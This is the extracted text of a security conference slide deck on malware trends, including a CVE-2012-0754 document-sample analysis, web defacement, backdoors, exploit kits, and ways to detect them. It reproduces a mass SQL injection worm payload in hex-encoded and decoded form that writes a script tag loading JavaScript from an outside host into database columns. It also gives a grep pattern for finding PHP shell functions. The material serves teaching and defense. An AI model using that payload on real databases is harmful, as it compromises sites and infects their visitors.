www.cdicconference.

com

Is Your Privacy at Risk? Security and Privacy Challenges in the Digital Modernity

.
SANS GIAC GPEN, eCPPT, ECSA, CEH, CPTS, CIW Security Analyst, CWNA, CWSP, Security+, ITIL-F Section Manager, Senior Information Security Consultant ACIS Professional Center
1

Lets Party Rock

Next Generation for Malware

Malware Analysis

Web Based Malware

Back to the Past Back to the Future

Lab Challenge

www.cdicconference.com

Is Your Privacy at Risk? Security and Privacy Challenges in the Digital Modernity

Next Generation of Malware

3

Old Malware fashion

Executable file
Packer, Crypter => FUD just 1 Week !!

Spyware / Adware Rogue Security Software Virus / Worm

USB Autorun

Antivirus Detected

Gotcha !!

Virustotal

Virustotal One Week later

Anubis: Analyzing Binary File

Latest Malware fashion

MS Office+Flash Player

PDF Reader Mobile Application Social Network Application Web Browser Toolbar Web based Malware

Bypassing Antivirus

Ninja Techniques

10

10

Malware Analysis

11

11

CVE-2012-0754: SWF in DOC

Irans Oil and Nuclear Situation.doc
Contains flash instructing it to download and
Parse a malformed MP4.

OS Affect
Adobe Flash Player before 10.3.183.15 and 11.x

Before 11.1.102.62 on Windows, Mac OS X, Linux

And Solaris

Mobile Affect
Adobe Flash Player before 11.1.111.6 on
Android 2.x and 3.x and before 11.1.115.6 on

Android 4.x

12

12

Document Analysis
Decompiled Flash from file
This.MyNS.play(http://208.115.230.76/test.mp4);

Whois 208.115.230.76
208.115.230.76 76-230-115-208.static.reverse.lstn.net Host reachable, 77 ms. average, 2 of 4 pings lost 208.115.192.0 - 208.115.255.255 Limestone Networks, Inc. 400 S. Akard Street Suite 200 Dallas TX 75202 United States

13

13

Process Monitor network log

14

14

Process Monitor network log

15

15

Traffic and C&C (us.exe)

16

16

Virus Analysis us.exe

17

17

Target Analysis
Whois 199.192.156.134
199.192.156.134 Host reachable, 89 ms. average 199.192.152.0 - 199.192.159.255 VPS21 LTD 38958 S FREMONT BLVD FREMONT CA 94536 United States zou, jinhe +1-408-205-7550

18

18

www.cdicconference.com

Is Your Privacy at Risk? Security and Privacy Challenges in the Digital Modernity

Web Based Malware

19

Back to the Past

20

20

Web Defacement

21

21

Zone-H

22

22

Ddos Tool

23

23

Hack 4 Fun and Profit

24

24

Back to the Future

25

25

About My Memory
2008
Oishi website was hacked without defacement Kaspersky AV alert for A little javascript file

2009
SQL injection worms on MSSQL

Affect many Bank on Thailand

2010

Google and Firefox alert for malware website

Obfuscation JS to bypass AV

2011
Many website was blocked by Google Malware

26

26

SQL Injection Worms

';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043 004C004100520045002000400054002000760061007200630068006100720 0280032003500350029002C00400043002000760061007200630068006100 72002800320035003500290020004400450043004C0041005200450020005 400610062006C0065005F0043007500720073006F00720020004300550052 0053004F005200200046004F0052002000730065006C00650063007400200 061002E006E0061006D0065002C0062002E006E0061006D00650020006600 72006F006D0020007300790073006F0062006A00650063007400730020006 1002C0073007900730063006F006C0075006D006E00730020006200200077 006800650072006500200061002E00690064003D0062002E0069006400200 061006E006400200061002E00780074007900700065003D00270075002700 200061006E0064002000280062002E00780074007900700065003D0039003 90020006F007200200062002E00780074007900700065003D003300350020 006F007200200062002E00780074007900700065003D00320033003100200 06F007200200062002E00780074007900700065003D003100AS%20NVARC HAR(4000));EXEC(@S);--

27

27

SQL Injection Worms

';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(D E C L A R E @T varchar(255),@C varchar(255) DECLARE T able_Cursor CURSOR FOR select a.name,b.nam e from sysobjects a,syscolumns b where a.id =b.id and a.xtype='u' and (b.xtype=99 or b.x type=35 or b.xtype=231 or b.xtype=167) OPE N Table_Cursor FETCH NEXT FROM Table_Cur sor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=r trim(convert(varchar,['+@C+']))+''<script sr c=http://www.fengnima.cn/k.js></script>''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_C u r s o r undefined AS%20NVARCHAR(4000));EXEC(@S);--

28

28

Web Application Backdoor

29

29

Web Application Backdoor FUD

30

30

Redbull.php (PHP Backdoor)

31

31

Insert Malicious JS into config.inc.php

32

32

Crimepack Exploit Kit

33

33

Crimeware Exploit Kit

34

34

Drive-By Download
Visit Malicious Website Malicious JS execute

Web Server

Redirect to Malware Server

Reverse Shell to Attacker

Exploit Browser / Flash Player

Malware Server

35

34

Google Malware Alert

36

35

Google Diagnostic

37

36

http://www.stopbadware.org/hom e/reviewinfo

38

37

http://sitecheck.sucuri.net/scanner

39

38

http://sucuri.net/malware/malwar e-entry-mwhta7

40

39

http://sucuri.net/malware/malwar e-entry-mwhta7

41

40

http://www.urlvoid.com

42

41

Detect Webserver Backdoor

Manual Source review NeoPI Neohapsis PHP Shell Scanner http://25yearsofprogramming.com/php/findmaliciouscode.htm grep -RPl --include=*.{php,txt,asp} "(passthru|shell_exec|system|phpinfo|base64_decode|chmod|mkdi r|fopen|fclose|readfile) *\( /var/www/

43

42

PHP Shell Scanner

44

43

Undetectable #1

45

44

Undetectable #2

46

45

JS De-Obfuscate Tool
Google Chrome Developer Tools Firebug (Firefoxs plugin) JSDebug (Firefoxs plugin) Javascript Deobfuscator (Firefoxs plugin) Malzilla Rhino SpiderMonkey

47

46

Simple JS Obfuscate

48

47

Simple JS Obfuscate

49

48

www.cdicconference.com

Is Your Privacy at Risk? Security and Privacy Challenges in the Digital Modernity

Lab Challenge
50

Be Safe
www.cdicconference.com

51

50